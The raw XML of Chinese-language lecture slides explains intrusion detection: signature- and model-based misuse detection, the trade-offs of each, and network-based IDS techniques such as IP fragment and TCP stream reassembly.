        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294454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801688" marR="0" lvl="1" indent="-45720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lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>我们再来看一个特征分析误用检测，将入侵行为表示成数据样板的例子</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="801688" marR="0" lvl="1" indent="-45720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endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>分别将面向主机的端口扫描、面向网络的端口扫描、震荡波、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>SQLSammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>蠕虫攻击、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Netbus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>特洛伊木马、红色代码、垃圾邮件服务器等攻击的数据特征。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="801688" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4131610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3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>另外一种误用检测方法就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>模型推理误用检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>模型推理误用检测方法是：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>根据网络入侵行为的特征建立误用证据模型，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>入侵检测系统根据模型中的入侵行为特征进行推理，判断当前的用户行为是否是误用行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>模型误用检测方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>需要建立攻击场景数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="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攻击行为序列）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>预警器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>（根据当前活动模型产生下一步行为）和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>规划者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>（将假设行为与审计数据结合进行判断处理）。可以检测组合攻击或多步攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>优点是：数学中的未确定推理理论作为基础，可以用模型证据来推理专家系统不容易处理的未确定的中间结论，而且还能够减少审计数据量。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>缺点：增加了创建入侵检测模型的系统开销；需要对数据库进行不断地扩充</a:t>
            </a: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3277157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对误用检测方法，其优点是：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、检测准确率高，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、技术相对成熟，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、也便于系统维护；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>但是它也存在响应的缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、不能检测未知的入侵行为；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、依赖于入侵特征的有效性；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、需要投入大量的精力维护入侵特征数据库。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26426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前面我们讨论了入侵检测的主要原理和方法，那么我们在使用这些原理和方法构建一个入侵检测系统时，又能够采用什么样的结构呢？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD448C87-023D-4E49-B603-34FECE4E8D7D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="839018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首先我们来看基于网络的入侵检测系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于网络的入侵检测系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Network-based Intrusion Detection System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）通常是作为一个独立的个体并联在被保护的网络上，以网络包作为分析数据源。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>采用包嗅探器和网络监视器，实时监视并分析网络数据流，然后检查数据包，发现攻击特征。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101"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en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>具有很多优点，主要表现在：</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、成本低；</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的检测数据来源于网络数据流，因此攻击者很难消除或者转移攻击证据；</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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、能够针对攻击进行实时的检测和响应；</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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、甚至能够检测那些未能实施成功的攻击企业；</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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、最后一个优点就是它独立于操作系统，不受操作系统类型、版本等因素的干扰。</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sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>除了前面讨论过的入侵检测方法，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>还涉及到一些关键技术。</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例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>碎片重组技术、</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流重组技术、</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状态检测技术、网络协议分析技术、零复制技术和蜜罐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蜜网技术等等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接下来对几种关键技术进行更加详细一些的介绍。</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首先是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>碎片重组技术。</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针对攻击者将攻击请求分成若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>碎片包发送到目标主机以绕开安全机制的问题。入侵检测系统需要将内存缓存的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>碎片，模拟目标主机进行重组，还原出真正的请求内容之后在进行入侵检测分析。</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这就需要使用到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>碎片重组技术。</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sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二种是关键技术时</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流重组技术。</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在入侵检测过程中，最关键的任务之一就是重组通过</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链接交换的数据。</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提供了足够多的信息帮助系统判断数据的有效性，其重传机制可以确保数据准确到达。但是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>这种被动的监视系统无法主动使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP</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重传机制，</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如果数据传输中出现报文丢失或者失序，将导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>无法进行序列号追踪，增加检测难度。</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如何在这种情况下对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
